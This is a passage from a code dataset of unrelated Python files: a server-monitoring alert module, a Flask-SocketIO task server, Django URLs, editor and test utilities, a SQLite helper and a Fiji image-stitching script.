threshold.\n                if value >= self.highValue:\n                    subject = basic.HOSTNAME + ': ' + self.valueName + ' high!'\n                    message = self.valueName + ': ' + str(value) + self.unit\n                    self.sendMail(subject, message)\n                    self.eventInAction = True\n                    self.eventInActionStartTime = self.getTime()\n        else:\n            if self.getTime()-self.eventInActionStartTime >= self.notifyInterval:\n                self.eventInAction = False\n    \n    def getTime(self):\n        return time.mktime(time.localtime())\n\nclass Low_Event(object):\n    def __init__(self, eventConfig, mailMethod):\n        self.getValue = basic.valueGetter.get\n        self.sendMail = mailMethod\n        self.valueName = eventConfig['value']\n        self.unit = eventConfig['unit']\n        self.lowValue = eventConfig['lowValue']\n        self.notifyInterval = eventConfig['notifyInterval']\n        self.eventInAction = False\n        self.eventInActionStartTime = False\n\n    def run(self):\n        values = self.getValue(self.valueName)\n        if not self.eventInAction:\n            for value in values:\n                if value <= self.lowValue:\n                    subject = basic.HOSTNAME + ': ' + self.valueName + ' low!'\n                    message = self.valueName + ': ' + str(value) + self.unit\n                    self.sendMail(subject, message)\n                    self.eventInAction = True\n                    self.eventInActionStartTime = self.getTime()\n        else:\n            if self.getTime()-self.eventInActionStartTime >= self.notifyInterval:\n                self.eventInAction = False\n    \n    def getTime(self):\n        return time.mktime(time.localtime())\n\nclass FileChange_Event(object):\n    def __init__(self, eventConfig, 
mailMethod):\n self.sendMail = mailMethod\n self.ignore = ('.swp',)\n self.path = eventConfig['path']\n if os.path.isfile(self.path):\n self.md5 = None\n self.oldmd5 = None\n elif os.path.isdir(self.path):\n self.md5 = {}\n self.oldmd5 = {} \n\n def run(self):\n if os.path.isfile(self.path):\n self.oldmd5 = self.md5\n self.md5 = os.popen('md5sum ' + self.path).read()[:32]\n if not self.md5 == self.oldmd5:\n subject = basic.HOSTNAME + ': File changed: ' + self.path\n message = 'changed from:\\n '+str(self.oldmd5)+'\\nto:\\n '+ self.md5\n self.sendMail(subject, message)\n elif os.path.isdir(self.path):\n self.oldmd5 = self.md5.copy()\n for entry in os.listdir(self.path):\n path = os.path.join(self.path, entry)\n if not path[-4:] in self.ignore:\n if os.path.isfile(path):\n self.md5[path] = os.popen('md5sum ' + path).read()[:32]\n try:\n if not self.md5[path] == self.oldmd5[path]:\n subject = basic.HOSTNAME + ': File changed: ' + path\n message = 'changed from:\\n '+str(self.oldmd5[path])+'\\nto:\\n '+ self.md5[path]\n self.sendMail(subject, message) \n except KeyError:\n pass\n\nclass HDDFreeSpaceLow_Event(object):\n def __init__(self, eventConfig, mailMethod):\n self.getValue = basic.valueGetter.get\n self.sendMail = mailMethod\n self.mointPoint = eventConfig['mountPoint']\n self.notifyInterval = eventConfig['notifyInterval']\n self.minimalMB = eventConfig['minimalMB']\n self.eventInAction = False\n self.eventInActionStartTime = False\n\n def run(self):\n mointPointInfos = self.getValue('HDDFREESPACE')\n try:\n if not self.eventInAction:\n if mointPointInfos[self.mointPoint]['free'] <= self.minimalMB:\n subject = basic.HOSTNAME + ': HDD low free space: ' + self.mointPoint\n message = self.mointPoint + ':\\n' + json.dumps(mointPointInfos[self.mointPoint], indent=4)\n self.sendMail(subject, message)\n self.eventInAction = True\n self.eventInActionStartTime = self.getTime()\n else:\n if self.getTime()-self.eventInActionStartTime >= self.notifyInterval:\n self.eventInAction = False \n except KeyError:\n return False\n\n def getTime(self):\n return time.mktime(time.localtime())\n\nclass InternetOffline_Event(object):\n def __init__(self, eventConfig, mailMethod):\n self.sendMail = mailMethod\n self.reactionTime = eventConfig['reactionTime']\n self.onlineCheckIPs = eventConfig['onlineCheckIPs']\n self.offlineTime = 0\n self.eventInAction = False\n self.lastOnlineTime = False\n self.mailSended = False\n\n def run(self):\n psax = system.getRunningProcesses()\n if not 's87reconnect' in psax:\n online = False\n for server in self.onlineCheckIPs:\n if basic.ping(server):\n online = True\n break\n if online:\n if self.eventInAction:\n self.offlineTime = self.getTime()-self.lastOnlineTime\n subject = basic.HOSTNAME + ': connection error!'\n message = 'Internet connection was down for '+ str(self.offlineTime) + ' sec.\\nNew ip is ' + system.getExternIP()\n self.sendMail(subject, message) \n self.lastOnlineTime = self.getTime()\n self.eventInAction = False\n self.mailSended = False\n else:\n self.eventInAction = True\n if self.eventInAction:\n if self.lastOnlineTime <= self.getTime()-self.reactionTime:\n if not self.mailSended:\n subject = basic.HOSTNAME + ': connection error!'\n message = 'Internet connection is down!'\n self.sendMail(subject, message)\n self.mailSended = True \n\n def getTime(self):\n return time.mktime(time.localtime())\n\nclass DailyHDDSpaceInfo_Event(object):\n def __init__(self, eventConfig, mailMethod):\n self.getValue = basic.valueGetter.get\n self.sendMail = mailMethod\n 
self.valueName = eventConfig['value']\n        self.time = eventConfig['time']\n        self.mailSended = False\n    \n    def run(self):\n        if time.strftime('%H:%M') == self.time:\n            if not self.mailSended:\n                values = self.getValue(self.valueName)\n                subject = basic.HOSTNAME + ': ' + self.valueName + ' info.'\n                message = 'HDD Memory Info:\\n\\n'\n                for mountPoint in values.keys():\n                    if mountPoint in basic.s87config['s87notify']['mountPoints']:\n                        message += mountPoint + ':\\n  '+'capacity:'.ljust(20,'.') + str(values[mountPoint]['capacity']).rjust(12,'.')+ ' MB\\n  ' + 'free:'.ljust(20,'.')+ str(values[mountPoint]['free']).rjust(12,'.')+ ' MB\\n  ' + 'in use:'.ljust(20,'.')+ str(values[mountPoint]['used%']).rjust(12,'.') + ' %\\n\\n'\n                self.sendMail(subject, message)\n                self.mailSended = True\n        else:\n            self.mailSended = False\n\nclass Customized_Event(object):\n    def __init__(self, eventConfig, mailMethod):\n        self.sendMail = mailMethod\n        self.command = eventConfig['command']\n        self.searchText = eventConfig['searchText']\n        self.eventByFound = eventConfig['eventByFound']\n        self.interval = eventConfig['interval']\n        self.eventInAction = False\n        self.eventInActionStartTime = False\n        try:\n            self.runCommand = eventConfig['run']\n        except KeyError:\n            self.runCommand = False\n\n    def run(self):\n        if not self.eventInAction:\n            self.eventInAction = True\n            self.eventInActionStartTime = self.getTime()\n            out = os.popen(self.command + ' 2>&1').read().decode(\"utf8\")\n            if self.searchText in out:\n                found = True\n            else:\n                found = False\n            \n            if found == self.eventByFound:\n                subject = basic.HOSTNAME + ': Customized_Event.'\n                message = 'Customized_Event:\\n\\nCommand:\\n  '+ self.command + '\\n\\nOutput:\\n  ' + out\n                self.sendMail(subject, message)\n                if not self.runCommand == False:\n                    os.popen(self.runCommand + ' &')\n        else:\n            if self.getTime()-self.eventInActionStartTime >= self.interval:\n                self.eventInAction = False  \n\n    def getTime(self):\n        return time.mktime(time.localtime())\n\n\n\n\n\n","sub_path":"bin/lib/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":12023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"493623782","text":"'''\nStart the system in server mode\n'''\n\nfrom flask_socketio import emit\nimport json\n\nimport NodeCheck\nimport NodeConnect\nimport NodeManager\nimport NodeSourceManager\nimport TaskManager\nimport TaskSchedule\nimport Web\n\n\nclass Server(object):\n    def __init__(self):\n        print(\"Start as Server...\")\n\n    def load_modules(self):\n        '''\n        Load the seven modules\n        '''\n        self.node_check = NodeCheck.NodeCheck()\n        self.node_connect = NodeConnect.NodeConnect()\n        self.node_manager = NodeManager.NodeManager()\n        self.node_source_manager = NodeSourceManager.NodeSourceManager()\n        self.task_manager = TaskManager.TaskManager()\n        self.task_schedule = TaskSchedule.TaskSchedule()\n        self.web = Web.Web()\n\n    def start(self):\n        '''\n        Start as a server\n        '''\n        self.web.start()\n\n\nserver = Server()\nserver.load_modules()\n\nsocketio = server.web.get_socketio()\n\n@socketio.on_error()\ndef default_error(e):\n    print('Error')\n\n\n@socketio.on('message')\ndef connect(message):\n    print('Get message', message)\n\n\n@socketio.on('test')\ndef test(message):\n    print('Get a test message', message)\n\n\n@socketio.on('GET_TASK')\ndef get_a_task():\n    # Fetch one task from the queue\n    TM = TaskManager.TaskManager()\n    a = TM.get_task_in_queue()\n    # Convert part of the task into a JSON string\n    data = {\n        'id':a.index,\n        'passcode':a.passcode,\n        'sourcefile_path':a.sourcefile_path,\n    }\n    json_str = json.dumps(data)\n    # Send the JSON string back\n    
emit('GET_TASK_response',json_str)\n\n\nif __name__ == '__main__':\n server.start()\n","sub_path":"server_start.py","file_name":"server_start.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"127190859","text":"from .base import Base\n\nclass Filter(Base):\n def __init__(self, vim):\n super().__init__(vim)\n self.name = \"converter_remove_info\"\n self.description = \"Remove unnecessary data from completions\"\n\n def filter(self, context):\n for candidate in context[\"candidates\"]:\n candidate.pop(\"info\", None)\n if candidate.get(\"kind\", None) == \"Module\":\n candidate.pop(\"menu\", None)\n return context[\"candidates\"]\n","sub_path":"nvim/rplugin/python3/deoplete/filter/converter_remove_info.py","file_name":"converter_remove_info.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"542799060","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\n\nfrom rest_framework import routers\nfrom api.views import (TheoremViewSet, \n AxiomViewSet,\n AxiomHighlight, \n DefinitionViewSet,\n UserViewSet,\n GroupViewSet,\n TheoremHighlight,\n DefinitionHighlight,\n ArgumentViewSet,\n StatementViewSet,\n BookViewSet,)\n\nfrom rest_framework.decorators import api_view, renderer_classes\nfrom rest_framework_swagger.renderers import OpenAPIRenderer, SwaggerUIRenderer\nfrom rest_framework import renderers, response, schemas\n\nfrom django.conf.urls.static import static\nfrom django.conf import settings\n\n\nrouter = routers.DefaultRouter()\n\nrouter.register(r'users',UserViewSet)\nrouter.register(r'books', BookViewSet)\nrouter.register(r'arguments',ArgumentViewSet)\nrouter.register(r'statements',StatementViewSet)\n\n\n@api_view()\n@renderer_classes([SwaggerUIRenderer, OpenAPIRenderer, renderers.CoreJSONRenderer])\ndef schema_view(request):\n generator = schemas.SchemaGenerator(title='OKR API')\n return response.Response(generator.get_schema(request=request))\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n\n url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),\n url('^$', schema_view),\n url(r'^api/', include(router.urls)),\n\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\n\n","sub_path":"ox_proofs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"129778351","text":"import random \nimport struct \n\nf= open(\"data.s\",'w')\nf.write('.section \".text\" \\n.align 4\\n.global gen \\n.type gen, #function\\ngen:\\n\\tsave %sp, -120, %sp\\n\\tset data,%i0\\n\\trestore\\n\\tretl\\n\\tnop\\n.section \".data\"\\n.align 8 \\n.global data\\ndata:\\n')\ni=0\nwhile(i<32):\n\tf.write(\".word\t\")\n\t#x=random.randrange(-1000, 100, 2)\n\t#f.write(str(x))\n\n\t#x=random.uniform(-2.56,0)\n\t#s = struct.pack('>f', x)\n\t#i = struct.unpack('>I', s)[0]\n\t#f.write(hex(i))\n\tx=int(i/2)\n\tf.write('0x3f800000')\n\tf.write('\\n')\n\tf.write(\".word\t\")\n\tf.write('0x3f800000')\n\tf.write('\\n')\n\ti+=2\n\t\nf.close()\n","sub_path":"fft/fft_radix_two_complex/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"527038753","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled 
from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\tests\\plugins\\poweradminurt\\iourt42\\test_cmd_kill.py\n# Compiled at: 2016-03-08 18:42:10\nfrom mock import call, Mock\nfrom b3.config import CfgConfigParser\nfrom b3.plugins.poweradminurt import PoweradminurtPlugin\nfrom tests.plugins.poweradminurt.iourt42 import Iourt42TestCase\n\nclass Test_cmd_kill(Iourt42TestCase):\n\n def setUp(self):\n super(Test_cmd_kill, self).setUp()\n self.conf = CfgConfigParser()\n self.conf.loadFromString('\\n[commands]\\npakill-kill: 20\\n ')\n self.p = PoweradminurtPlugin(self.console, self.conf)\n self.init_default_cvar()\n self.p.onLoadConfig()\n self.p.onStartup()\n self.console.say = Mock()\n self.console.write = Mock()\n self.moderator.connects('2')\n\n def tearDown(self):\n super(Test_cmd_kill, self).tearDown()\n\n def test_no_argument(self):\n self.moderator.message_history = []\n self.moderator.says('!kill')\n self.assertEqual(['invalid data, try !help pakill'], self.moderator.message_history)\n self.console.write.assert_has_calls([])\n\n def test_unknown_player(self):\n self.moderator.message_history = []\n self.moderator.says('!kill f00')\n self.assertEqual(['No players found matching f00'], self.moderator.message_history)\n self.console.write.assert_has_calls([])\n\n def test_joe(self):\n self.joe.connects('3')\n self.moderator.message_history = []\n self.moderator.says('!kill joe')\n self.assertEqual([], self.moderator.message_history)\n self.assertEqual([], self.joe.message_history)\n self.console.write.assert_has_calls([call('smite 3')])","sub_path":"pycfiles/b3-1.10.10-py2.7/test_cmd_kill.py","file_name":"test_cmd_kill.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"422190767","text":"import ConfigParser\nimport os\n\n\ndef output_hello_world():\n print(\"Hello World!\")\n return True\n\n\ndef check_options():\n opt_path = os.path.dirname(os.path.abspath(__file__))\n opt_file = os.path.join(opt_path, \"..\\\\runTestOptions.ini\")\n config = ConfigParser.ConfigParser()\n try:\n config.readfp(open(opt_file))\n return config.get(\"TESTING_OPTIONS\", \"TestCases\")\n except IOError:\n print(\"ERR: opt_file path incorrect with - %s\" % opt_file)\n\n\nif __name__ == \"__main__\":\n print(\"Entering demo\")\n","sub_path":"1604_robot/libraries/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"255351463","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 30 17:43:54 2020\n\n@author: konrad\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport ot\nimport time\nfrom scipy.interpolate import griddata\nfrom skimage.measure import block_reduce\nfrom scipy.spatial.distance import cdist\n\nimport VortexLine as VL\nimport PhysicalCalculations as PC\n\n# %% Exvelo base\ndef exvelo_base(xt, yt, ut, vt):\n u_out = griddata(np.vstack((x.flatten(), y.flatten())).transpose(),\n ut.flatten(), np.vstack((xt, yt)).transpose())\n v_out = griddata(np.vstack((x.flatten(), y.flatten())).transpose(),\n vt.flatten(), np.vstack((xt, yt)).transpose())\n return u_out, v_out\n\n\n# %%Setup \nAoA = (0, 10, 20)\nn_weights = 11\n\ntemp = np.linspace(0., 1, n_weights)\nweights = np.vstack((temp, 1-temp)).transpose()\n\nstep = 1\norder = 2\nvort_thr = .3\n\n# %% Read 
Simulation Data\nx_full, y_full, u_full, v_full,\\\n vort_full, u_std, v_std, Cont, Mom = PC.Read_Data(AoA, step=step)\n\nx, y, u, v, vort = PC.make_square(x_full, y_full, u_full, v_full, vort_full,\n 1000, step=step)\n\nMom_OT = np.zeros((n_weights, ))\nMom_lin = np.zeros_like(Mom_OT)\nvort_OT_norm = np.zeros_like(Mom_OT)\nvort_lin_norm = np.zeros_like(Mom_OT)\n\ndx = np.gradient(x[0, :])\ndy = np.gradient(y[:, 0])\nMom_sq = PC.Momentum(vort[1], u[1], v[1], dx, dy)\n\n# %% Read OT Results\nfor i, w in enumerate(weights):\n x_OT = np.genfromtxt(\"../Data/OT_Results/{:.0f}_{:.0f}_{:.0f}_{:.2f}_{:.2f}_x.csv\"\n .format(AoA[0], AoA[1], AoA[2], w[0], w[1]), delimiter=\",\")\n \n y_OT = np.genfromtxt(\"../Data/OT_Results/{:.0f}_{:.0f}_{:.0f}_{:.2f}_{:.2f}_y.csv\"\n .format(AoA[0], AoA[1], AoA[2], w[0], w[1]), delimiter=\",\")\n \n vort_OT_pos = np.genfromtxt(\"../Data/OT_Results/{:.0f}_{:.0f}_{:.0f}_{:.2f}_{:.2f}_pos.csv\"\n .format(AoA[0], AoA[1], AoA[2], w[0], w[1]), delimiter=\",\")\n \n vort_OT_neg = np.genfromtxt(\"../Data/OT_Results/{:.0f}_{:.0f}_{:.0f}_{:.2f}_{:.2f}_neg.csv\"\n .format(AoA[0], AoA[1], AoA[2], w[0], w[1]), delimiter=\",\")\n \n sums = np.genfromtxt(\"../Data/OT_Results/{:.0f}_{:.0f}_{:.0f}_{:.2f}_{:.2f}_sums.csv\"\n .format(AoA[0], AoA[1], AoA[2], w[0], w[1]), delimiter=\",\")\n \n vort_OT = vort_OT_pos*np.sum(w*sums[0])\\\n - vort_OT_neg*np.sum(w*sums[1])\n \n vort_OT_norm[i] = np.linalg.norm(abs(vort_OT-vort[1]), ord=order)\n \n # %% Calcualte Velocities\n mask_vort = abs(vort_OT) > vort_thr*np.max(abs(vort_OT))\n u_OT_vort, v_OT_vort = PC.u_omega(x, y, x[mask_vort], y[mask_vort],\n vort_OT[mask_vort], h=step)\n \n print('Creating & Solving Vortex Line')\n start_VL = time.time()\n x_arc, y_arc = PC.Gen_Arc_full_res(AoA[1])\n \n Arc = VL.VortexLine(x_arc, y_arc)\n \n exvelo_OT = lambda xl, yl: exvelo_base(xl, yl, u_OT_vort+1, v_OT_vort)\n \n gamma_OT = Arc.solve_gamma(exvelo_OT)\n \n u_OT_vl, v_OT_vl = Arc.velocity(gamma_OT, x, y)\n \n \n u_OT_tot = u_OT_vort - u_OT_vl + 1\n v_OT_tot = v_OT_vort - v_OT_vl\n \n Mom_OT[i] = np.linalg.norm(PC.Momentum(vort_OT, u_OT_tot, v_OT_tot,\n dx, dy), ord=order)\n \n # %% Calculate Linear Interpolation\n \n vort_lin = (vort[0]*w[0] + vort[2]*w[1])\n vort_lin_norm[i] = np.linalg.norm(abs(vort_lin-vort[1]), ord=order)\n\n # %% Calculate Velocities\n \n mask_vort = abs(vort_lin) > vort_thr*np.max(abs(vort_lin))\n u_lin_vort, v_lin_vort = PC.u_omega(x, y, x[mask_vort], y[mask_vort],\n vort_lin[mask_vort], h=step)\n \n exvelo_lin = lambda xl, yl: exvelo_base(xl, yl, u_lin_vort+1, v_lin_vort)\n gamma_lin = Arc.solve_gamma(exvelo_lin)\n u_lin_vl, v_lin_vl = Arc.velocity(gamma_lin, x, y)\n \n u_lin_tot = u_lin_vort - u_lin_vl + 1\n v_lin_tot = v_lin_vort - v_lin_vl\n \n Mom_lin[i] = np.linalg.norm(PC.Momentum(vort_lin, u_lin_tot, v_lin_tot,\n dx, dy), ord=order)\n# %% PLOTS\n# %% Vorticity & Momentum\nf, ax = plt.subplots(2, 1, sharex=True)\n# f.suptitle(\"{:.0f}° - {:.0f}° - {:.0f}°, Momentum and Vorticity Error\".format(AoA[0], AoA[1], AoA[2]))\n\nax[0].plot(weights[:][:, 0], Mom_OT/np.linalg.norm(Mom_sq, ord=order),\n 'b', label='OT')\nax[0].plot(weights[:][:, 0], Mom_lin/np.linalg.norm(Mom_sq, ord=order),\n 'r', label='Linear')\nax[0].scatter(weights[Mom_OT.argmin(), 0],\n np.min(Mom_OT)/np.linalg.norm(Mom_sq, ord=order),\n marker='x', color='b')\nax[0].scatter(weights[Mom_lin.argmin(), 0],\n np.min(Mom_lin)/np.linalg.norm(Mom_sq, ord=order),\n marker='x', color='r')\nax[0].legend()\n\nax[1].plot(weights[:][:, 0], 
vort_OT_norm/np.linalg.norm(vort[1], ord=order),\n           'b', label='Vorticity OT')\nax[1].plot(weights[:][:, 0], vort_lin_norm/np.linalg.norm(vort[1], ord=order),\n           'r', label='Vorticity Linear')\nax[1].scatter(weights[vort_OT_norm.argmin(), 0],\n              np.min(vort_OT_norm)/np.linalg.norm(vort[1], ord=order),\n              marker='x', color='b')\nax[1].scatter(weights[vort_lin_norm.argmin(), 0],\n              np.min(vort_lin_norm)/np.linalg.norm(vort[1], ord=order),\n              marker='x', color='r')\n\nax[1].set_xlabel(\"Weight {:.0f}° Sim\".format(AoA[0]))\nax[1].set_ylabel(\"Vorticity Error\")\nax[0].set_ylabel(\"Momentum Error\")\n\n\n# %% Momentum\nf, ax = plt.subplots(1, 1, sharex=True)\n# f.suptitle(\"{:.0f}° - {:.0f}° - {:.0f}°, Momentum and Vorticity Error\".format(AoA[0], AoA[1], AoA[2]))\n\nax.plot(weights[:][:, 0], Mom_OT/np.linalg.norm(Mom_sq, ord=order),\n        'b', label='OT')\nax.plot(weights[:][:, 0], Mom_lin/np.linalg.norm(Mom_sq, ord=order),\n        'r', label='Linear')\nax.scatter(weights[Mom_OT.argmin(), 0],\n           np.min(Mom_OT)/np.linalg.norm(Mom_sq, ord=order),\n           marker='x', color='b')\nax.scatter(weights[Mom_lin.argmin(), 0],\n           np.min(Mom_lin)/np.linalg.norm(Mom_sq, ord=order),\n           marker='x', color='r')\nax.legend()\n\nax.set_xlabel(\"Weight {:.0f}° Sim\".format(AoA[0]))\nax.set_ylabel(\"Momentum Error\")\n\n","sub_path":"Code/Plot_Thesis_Results_Weights.py","file_name":"Plot_Thesis_Results_Weights.py","file_ext":"py","file_size_in_byte":6248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"324713683","text":"'''\n    UNUSED MODULE, REPLACED BY MODELS\n'''\n\nimport uuid\nimport sqlite3\n\nDATABASE = \"db.sqlite3\"\nCOLUMNS = {\"Users\" : [\"id\", \"forms\"],\n           \"Forms\" : [\"id\", \"ownerID\", \"questions\", \"correctAnswers\", \"userAnswers\"],\n           \"Questions\" : [\"id\", \"questionType\", \"question\", \"choices\", \"order\"],\n           \"Answers\" : [\"id\", \"questionType\", \"answer\"]}\n\ndef generateUUID():\n    return str(uuid.uuid4().int)[1:]\n\n\ndef query(table, tag, identity=None):\n    q = []\n    if(table.title() not in COLUMNS.keys() or tag not in COLUMNS[table.title()]):\n        raise ValueError\n    conn = sqlite3.connect(DATABASE)\n    cur = conn.cursor()\n    if(identity):\n        cur.execute(\"SELECT \"+tag+\" FROM \"+table.title()+\" WHERE id = '\"+identity+\"'\")\n    else:\n        cur.execute(\"SELECT \"+tag+\" FROM \"+table.title())\n    for fetch in cur.fetchall():\n        q.append(fetch[0])\n    conn.close()\n    return q\n\ndef commit(table, cols):\n    if(table.title() not in COLUMNS.keys() or len(cols) != len(COLUMNS[table.title()])):\n        raise ValueError\n    conn = sqlite3.connect(DATABASE)\n    cur = conn.cursor()\n    # Join the column and value lists with commas so the statement has no\n    # trailing comma before the closing parenthesis.\n    s = \"INSERT INTO \"+table.title()+\"(\"\n    s += \",\".join(COLUMNS[table.title()])\n    s += \") VALUES(\"\n    s += \",\".join(str(var) for var in cols)\n    s += \");\"\n    cur.execute(s)\n    conn.commit()\n    conn.close()","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"371181948","text":"#!/usr/bin/env python3\nfrom __future__ import print_function, division\nimport os\nimport glob\nimport tifffile\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport argparse\nimport shutil\nimport sys\nimport cv2\n#import magic\nimport re\nfrom PIL import Image, ImageOps\nfrom ast import literal_eval as make_tuple\nfrom tqdm import tqdm\nfrom pprint import pprint\nclass Fiji_Stitcher(object):\n    def __init__(self, input_dir, output_dir, cmin, cmax, overlap):\n        
self.input_dir = input_dir\n        self.output_dir = output_dir\n        self.cmin = cmin\n        self.cmax = cmax\n        self.overlap = overlap\n        self.ijm_file = None\n        self.flist = None\n        self.cc_flist = None\n        self.MIN_ROW = 0\n        self.MIN_COL = 0\n        self.MAX_ROW = 0\n        self.MAX_COL = 0\n        self.TILE_ROW = 0\n        self.TILE_COL = 0\n\n    def convert_to_8bit(self):\n        #self.convert_ijm_file = os.path.join(self.output_dir, 'convert_test.ijm')\n        #self.outdir = \n        ims = []\n        cc_path = os.path.join(self.output_dir, 'cc')\n        if not self.cc_flist:\n            self.cc_flist = []\n        if not os.path.exists(cc_path):\n            os.makedirs(cc_path)\n\n        for f_in in self.flist:\n            fname = os.path.split(f_in)[-1]\n            f_out = os.path.join(cc_path, fname)\n            self.cc_flist.append(f_out)\n            #print(out_f)\n            # Clip to [cmin, cmax], then rescale to the 8-bit range.\n            im = cv2.imread(f_in,cv2.IMREAD_UNCHANGED)\n            _im = np.clip(im,self.cmin, self.cmax)\n            _im = np.uint8((_im-self.cmin) / (self.cmax-self.cmin) * 255)\n            tifffile.imsave(f_out,_im)\n        self.cc_flist = sorted(self.cc_flist)\n\n    def prepare_macro(self):\n        self.ijm_file = os.path.join(self.output_dir, 'test.ijm')\n        commands = []\n        with open(self.ijm_file,'w') as f:\n            ##for fname in self.flist:\n                #print(fname)\n                #matches = re.match(r\"(?P<dirname>^.+)/(?P<exp_name>[^/]+)_y(?P<y>[0-9]+)_x(?P<x>[0-9]+).(?P<f_type>tif*)$\", fname)\n                #print(matches.groupdict())\n            ##tiles = glob.glob('Tile*.tif')\n            #exp_name = matches['exp_name']\n            #f_type = matches['f_type']\n            \n            #row = int(matches['y'])\n            #col = int(matches['x'])\n            if self.cc_flist:\n                FLIST = self.cc_flist\n            else:\n                FLIST = self.flist\n            for fname in FLIST:\n                matches = re.match(r\"(?P<dirname>^.+)/(?P<exp_name>[^/]+)_y(?P<y>[0-9]+)_x(?P<x>[0-9]+).(?P<f_type>tif*)$\", fname)\n                print(matches.groupdict())\n                row = int(matches['y'])\n                col = int(matches['x'])\n                dirname = matches['dirname']\n                exp_name = matches['exp_name']\n                f_type = matches['f_type']\n                self.MIN_ROW = min(self.MIN_ROW, row)\n                self.MIN_COL = min(self.MIN_COL, col)\n                self.MAX_ROW = max(self.MAX_ROW, row)\n                self.MAX_COL = max(self.MAX_COL, col)\n                print(self.MAX_ROW, self.MAX_COL)\n                #self.MAX_ROW = max(row)\n                #self.MAX_COL = max(col)\n                #longer_col = self.MAX_ROW < self.MAX_COL\n                #min_ind = np.argmin(col if longer_col else row)\n                #max_ind = np.argmax(col if longer_col else row)\n                #continue\n                #tilename = tiles[0][0:6]+'{y}'+tiles[0][7:9]+'{x}'+tiles[0][10:]\n                tilename = exp_name+'_y{y}_x{x}'+'.'+f_type\n                print(tilename)\n                #command = 'run(\"Grid/Collection stitching\", \"type=[Filename defined position] order=[Defined by filename ] grid_size_x='+str(self.MAX_COL)+' grid_size_y='+str(self.MAX_ROW)+ \\\n                #' tile_overlap=8 first_file_index_y='+str(self.MIN_COL)+' first_file_index_x='+str(self.MIN_ROW)+' directory='+dirname+ \\\n                #' file_names='+tilename+' output_textfile_name=TileConfiguration.txt fusion_method=[Average] regression_threshold=0.30 max/avg_displacement_threshold=2.50 absolute_displacement_threshold=3.50 compute_overlap computation_parameters=[Save computation time (but use more RAM)] image_output=[Write to disk] output_directory='+self.output_dir+'\");\\n'\n                # more pythonic\n\n                command = 'run(\"Grid/Collection stitching\", \"type=[Filename defined position] order=[Defined by filename ] grid_size_x={0:d} grid_size_y={1:d} \\\n                tile_overlap={2:d} first_file_index_y={3:d} first_file_index_x={4:d} directory={5:s} \\\n                file_names={6:s} output_textfile_name=TileConfiguration.txt fusion_method=[{7:s}] regression_threshold={8:.2f} max/avg_displacement_threshold={9:.2f} \\\n                absolute_displacement_threshold={10:.2f} compute_overlap {11:s} computation_parameters=[Save computation time (but use more RAM)] image_output=[Write to disk] 
output_directory={12:s}\");\\n'.format(\\\n                                        self.MAX_COL,\\\n                                        self.MAX_ROW,\\\n                                        self.overlap,\\\n                                        self.MIN_COL,\\\n                                        self.MIN_ROW,\\\n                                        dirname,\\\n                                        tilename,\\\n                                        'Linear Blending',\\\n                                        0.30,\\\n                                        2.50,\\\n                                        3.50,\\\n                                        'subpixel_accuracy',\\\n                                        self.output_dir)\n\n                #make sure you have the correct tile_overlap value and correct x and y units for the grid size\n                print(command)\n                #print(command)\n                f.write(command)\n                #min_fname = os.path.join(dirname, tiles[min_ind])\n                #max_fname = os.path.join(dirname, tiles[max_ind])\n                #print(min_fname,max_fname)\n\n            #except:\n                #continue\n        pass\n\n    def run_fiji(self):\n        print('fiji --headless -macro '+self.ijm_file)\n        os.system('fiji --headless -macro '+self.ijm_file)\n        pass\n\n    def unify_size(self, x_cut=0, y_cut=0):\n        get_index = lambda f: int(f.split('/')[-1].split('_')[1].split('.')[0])\n        out_flist = glob.glob(os.path.join(self.output_dir, 'S_*.tif'))\n        out_flist.sort(key=get_index)\n\n        cut_out_dir = os.path.join(self.output_dir, 'cut')\n        #print(out_flist)\n        \n        first_flag = True\n        for o in out_flist[0:3]:\n            old_data = cv2.imread(o,flags=cv2.IMREAD_GRAYSCALE)\n            print(old_data.shape)\n            if first_flag:\n                # Rows are trimmed with x_cut (shape[0]), columns with y_cut (shape[1]).\n                new_x = (x_cut, old_data.shape[0]-x_cut)\n                new_y = (y_cut, old_data.shape[1]-y_cut)\n                print(new_x,new_y)\n                first_flag = False\n            new_data = old_data[new_x[0]:new_x[1], new_y[0]:new_y[1]]\n            output_fname = os.path.split(o)[-1]\n            cv2.imwrite(os.path.join(self.output_dir,output_fname), new_data)\n            break\n\n    def run(self):\n        print(\"Input:\", self.input_dir)\n        print(\"Output:\", self.output_dir)\n\n        if not os.path.exists(self.output_dir):\n            os.makedirs(self.output_dir)\n        self.flist= glob.glob(os.path.join(self.input_dir,'*.tif*'))\n        #get_index = 